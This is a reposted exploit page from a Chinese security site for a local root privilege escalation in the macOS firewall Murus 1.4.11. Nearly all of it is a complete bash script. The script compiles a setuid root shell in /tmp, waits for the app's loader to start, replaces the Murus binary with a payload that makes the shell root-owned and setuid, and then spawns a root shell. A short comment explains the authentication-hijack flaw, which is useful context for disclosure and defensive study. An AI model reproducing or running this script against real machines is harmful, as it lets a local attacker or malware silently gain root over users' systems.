首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Murus 1.4.11 - Local root Privilege Escalation 来源：https://m4.rkw.io/blog.html 作者：Wadham 发布时间：2017-12-06   # I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus # firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings.   # If a local attacker or malware is running as an admin user (ie has write access to /Applications/) they can subvert this process to silently obtain root access # without the user knowing.   # https://m4.rkw.io/murus1.4.11.sh.txt # 9c332c07747e11c78c34f9dc8d30127250d95edd5e58a571ed1a005eafd32301 # ------------------------------------------------------------------------------- #!/bin/bash   ################################################################## ###### Murus 1.4.11 local root privilege escalation exploit ###### ###### by m4rkw - https://m4.rkw.io/blog.html               ###### ##################################################################   echo "compiling payloads..."   cat > /tmp/murus411_exp.c <<EOF #include <unistd.h> int main() {   setuid(0);   seteuid(0);   execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL);   return 0; } EOF   gcc -o /tmp/murus411_exp /tmp/murus411_exp.c   if [ ! $? -eq 0 ] ; then   rm -f /tmp/murus411_exp.c     echo "failed to compile, dev tools may not be installed"   exit 1 fi   rm -f /tmp/murus411_exp.c   cat > /tmp/murus411_exp2.c <<EOF #include <unistd.h> #include <stdlib.h> int main() {   setuid(0);   seteuid(0);   system("chown root:wheel /tmp/murus411_exp");   system("chmod 4755 /tmp/murus411_exp");   system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\ Murus.app/Contents/MacOS/Murus");   execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL);   return 0; } EOF   gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c rm -f /tmp/murus411_exp2.c   echo "waiting for loader..."   while : do   ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \     |grep -v grep 1>/dev/null   if [ $? -eq 0 ] ; then     break   fi done   echo "planting payload..."   mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\ Contents/MacOS/Murus.orig mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus   echo "waiting for payload to trigger..."   while : do   r=`ls -la /tmp/murus411_exp |grep root`   if [ "$r" != "" ] ; then     break   fi   sleep 0.1 done   echo "kapow"   /tmp/murus411_exp   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Arq 5.9.7 - Local root Privile ·Arq 5.9.6 - Local root Privile ·WinduCMS 3.1 - Local File Disc ·Hashicorp vagrant-vmware-fusio ·VX Search 10.2.14 - 'command_n ·Hashicorp vagrant-vmware-fusio ·Abyss Web Server < 2.11.6 - He ·Sera 1.2 - Local root Privileg ·Artica Web Proxy 3.06 - Remote ·Hashicorp vagrant-vmware-fusio ·MistServer 2.12 - Cross-Site S ·Hashicorp vagrant-vmware-fusio   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved